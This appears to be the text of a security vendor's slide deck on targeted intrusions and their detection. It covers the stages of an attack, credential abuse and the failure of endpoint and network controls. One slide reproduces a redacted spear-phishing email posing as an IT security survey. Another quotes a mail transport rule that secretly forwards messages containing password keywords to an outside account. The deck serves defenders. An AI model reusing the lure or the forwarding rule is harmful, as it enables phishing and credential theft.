Threat actors are increasingly employing evasive tactics that bypass traditional security controls, including more advanced technologies such as sandboxing. In this session, Dell SecureWorks will share examples of tactics used, their impact, what this means for organizations and new capabilities for addressing the risk posed by these threats.
7. What industry verticals are victims?
46%
19%
12%
8%
4%
4%
4%
4%
Targeted Intrusion Victims by Industry Vertical
Manufacturing
Technology Provider
Education
Other Services
Retail
Business Services
Media
Misc. Financial
Source: Targeted Threat Responses Jan 2015 – Sept 2015
8. Threat groups
• Known Tools (Infrastructure)
• Known Targets (pre-Compromise) & Victims (post-Compromise)
• Known Techniques & Procedures (Capability)
• Known Identity
Candidate
Threat
Groups
12. Watch your webmail…
spear phishing to corporate and personal mail
From: XXXXXXXX XXXXXXXX [mailto:xxxxxx.yyyyyyyy@zzzzzzzzz.zzz]
Sent: XXXXXXX, XXXXXXXX ##, 201X 11:01 PM
To: XXXXXXXX, XXXXXXXX
Subject: Internal Security Survey
Dear all,
Key target is finding and exploring company internal security problems in 201X.
Download the report: http://<company web domain>/download/survey.pdf
please fill the report and send to xxxxxx.yyyyyyyy@zzzzzzzzz.zzz tomorrow morning.
IT Department
13. 1. Adversary identifies websites known or suspected to be visited by designated target
2. Identified sites are probed for vulnerability
3. Adversary places exploits on one or more sites where it is likely to be accessed by targets
4. Users visit malicious website
5. Exploits are attempted against visitors. Delivery is often filtered by IP or other characteristics
6. Initial foothold malware is delivered to the victim
SitesofInterest
User Visits
Compromised
Site
Exploit used to
deliver initial
foothold malware
Strategic Web Compromise (SWC)
Identify
Vulnerable
Site & Place
Exploit
14. Scans website for available vulnerabilities
Deploys chinachopper shell
Adversary can now try to escalate privileges, dump passwords and move laterally in internal network
Identifies Struts with unpatched vulnerabilities
Exploiting weakness
15. • Exploitation of architecture and configuration
vulnerabilities
– just as effective
– just as devastating
– harder to detect
• Use available tools instead of malware
– Steal credentials
– Use existing administration tools
• Malware removed after initial intrusion
compromises credentials
Credential abuse
17. “Transport rule found on server that
blind copies any messages with
?CMS?, ?pw?, ?pwd?, ?pass? or
?password? in the body or subject
of an email on server XYZ to email
account
company2014@outlook.com”
Living off the Land
18. Current State of Affairs
How victims learned of targeted
intrusions across their organizations:
60% Third party detected adversary
tradecraft
28%
12%
Notified by law enforcement or
government entity
Staff discovered threat actor
activity
Source: Targeted Threat Responses Jan 2015 – Sept 2015
50%
In half of of targeted intrusions,
the entry point of the threat
actors was undetermined
100%
In all intrusions, threat actors
“lived off the land” using stolen
credentials and native tools to
achieve their mission
19. • Next Generation Toolsets provide only
limited value. Tools need to be updated
with the latest Threat intelligence,
continually monitored, and run by trained
professionals.
The industry’s definition of defeat is different
from our adversary's definition of winning.
20. XLSTrojan
Comfoo Trojan
Sajdela Trojan
Chinese Infostealer Blue
Butterfly Lingbo
Dynamer
Targeted-CG
Orsam
Leouncia
Huntah
Poison Ivy
Bifrose
Hupigon
PcClient
gh0st
Wkysol
ZWShell
Mswab
Mirage
Wykcores
Hydraq
Whitewell
Werchan
Foxjmp
Sanshell
Lostmin
Pirp
httpBrowser
And many more…
Malware doesn’t matter…
the adversaries simply don’t care
骑驴找马
21.
22. • Endpoint security controls fail
– AV fails
– Whitelisting fails
– Novel malware persistence mechanisms
› DLL Side Loading
› DLL Search Order Hijack
› Binary modification
– Memory based exploits
– Rootkits
– Even exploitation of the security software itself!
• Network controls fail
– Encrypted binary protocols over HTTP
– Use of common ports and protocols
– Frequently burning infrastructure
– Use of public services for C2 and exfil
• Log analysis detections fail
• Mobile Machine Learning Clouds of Advanced Malware Protection fail too!
But I have a magic mobile machine learning cloud
of advanced malware protection
23.
24.
25. Adaptable Persistent Threat
• Not a thing, a who
• Think project management…
– Adversary has already planned for most
common defenses and responses
– Setbacks trigger planning or strategy shifts, not
abandon
• Plan to fail…
– History teaches us that controls fail
– Endpoint controls fail
– Network controls fail
– Log and SIEM analytics fail
28. Reduce time to detect
advanced threat actor activity and
reduce effort to respond
to their operations
29. Lots of oppourtunity
We win by disrupting the threat actors before they complete their mission of data exfiltration
~1 month before data loss begins
~2 weeks to data exfiltration
~6 weeks before the threat actors win
37. DNS Telemetry
Internal
name server
.com Root
name server
foo.com
authoritative
name server
Request: A record
evil.foo.com
Request: NS record
foo.com
Request: A record
evil.foo.com
NS Response
A Record Response
A Record
Response
43. How do you win?
• Without significant tripwires, data exfiltration of sensitive intellectual property
occurred in 6 weeks
• With proper visibility, the threat actors could have been detected at least 6 different
ways within the first 6 hours of the intrusion
49. Context to answer the questions that matter
What is it? Is it really a threat?
Did it succeed? What happened next?
Who was behind it? What are their intentions?
Did they achieve their objectives yet?
How did they get in, where are they, how do I get them out and prevent them
from winning?
What should I do next?
Intelligence on threat actors
Ability to collect telemetry and apply that intelligence
in the network and at the endpoint
Analytics beyond malware and signatures